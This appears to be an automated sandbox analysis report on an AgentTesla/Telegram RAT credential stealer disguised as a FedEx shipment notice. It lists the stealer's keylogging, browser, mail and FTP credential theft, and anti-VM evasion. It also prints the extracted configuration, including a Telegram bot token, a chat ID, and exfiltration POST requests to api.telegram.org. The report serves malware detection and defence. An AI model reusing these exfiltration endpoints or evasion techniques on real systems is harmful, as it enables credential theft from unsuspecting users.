
Windows Analysis Report: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe

Overview

General Information

Sample Name: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Analysis ID: 528766
MD5: 994f1f286b24022af59bc5506b1e2871
SHA1: ed961648e2e90a311a9c5e53c15eed3d95853b96
SHA256: edd31cd4c64b1d9f392c6e141a10c028cb11f9640e6eab34960baf6bdd585dc5
Tags: exe, FedEx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Moves itself to temp directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(table truncated in the report: 18 entries)

Unpacked PEs

Source | Rule | Description | Author
1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(table truncated in the report: 17 entries)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.5604.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}
Multi AV Scanner detection for submitted file
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | ReversingLabs: Detection: 40%
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6 Host: api.telegram.org Content-Length: 1014 Expect: 100-continue Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9b06051514af6 Host: api.telegram.org Content-Length: 1900 Expect: 100-continue
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000003.487860465.0000000001630000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518406294.0000000001633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://yWRCNh.com
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp | String found in binary or memory: https://190L8dvjH7GrrK.net
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://190L8dvjH7GrrK.netP
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentdocument-----
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org4
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.orgD8
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | HTTP traffic detected: POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6 Host: api.telegram.org Content-Length: 1014 Expect: 100-continue Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
.NET source code contains very large array initializations
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, <PrivateImplementationDetails>{C619B418-655A-43C1-BD01-C10710B629CF}/384BCCB0-9651-44E6-A837-DA8EAFCCEF4C.cs | Large array initialization: .cctor: array initializer size 12200
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Binary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264554627.0000000006300000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264453189.0000000005F80000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.515825293.0000000000FC8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.517602931.000000000154A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Binary or memory string: OriginalFilenameDESCKI.exe. vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | ReversingLabs: Detection: 40%
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File read: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe:Zone.Identifier
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe "C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe"
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Process created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.log
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: /DESCKI;component/views/addbook.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: views/addcustomer.baml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: views/addbook.baml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: /DESCKI;component/views/addcustomer.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: I/DESCKI;component/views/addbook.xaml_/DESCKI;component/views/borrowfrombookview.xamlU/DESCKI;component/views/borrowingview.xamlO/DESCKI;component/views/changebook.xamlW/DESCKI;component/views/changecustomer.xamlS/DESCKI;component/views/customerview.xamlW/DESCKI;component/views/deletecustomer.xamlM/DESCKI;component/views/errorview.xamlQ/DESCKI;component/views/smallextras.xamlQ/DESCKI;component/views/addcustomer.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpacker
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.5.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.3.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.7.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.9.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_00B592F5 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_00B59361 push ds; retf
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_00B59347 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_00DB9347 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_00DB92F5 push ds; ret
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_00DB9361 push ds; retf
                      Source: initial sample | Static PE information: section name: .text entropy: 7.88525497927
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File created: \fedex shipment notification - air waybill fed1007990_a10792.exe

                      Hooking and other Techniques for Hiding and Protection:

                      Moves itself to temp directory
                      Source: c:\users\user\desktop\fedex shipment notification - air waybill fed1007990_a10792.exe | File moved: C:\Users\user\AppData\Local\Temp\tmpG721.tmp
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f9c210.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239889s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036 | Thread sleep count: 1650 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 5028 | Thread sleep time: -40928s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 6036 | Thread sleep count: 439 > 30
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239781s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239671s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239543s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239420s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239309s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239195s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -239063s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238937s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238813s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238671s >= -30000s
                      Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe TID: 1488 | Thread sleep time: -238562s >= -30000s
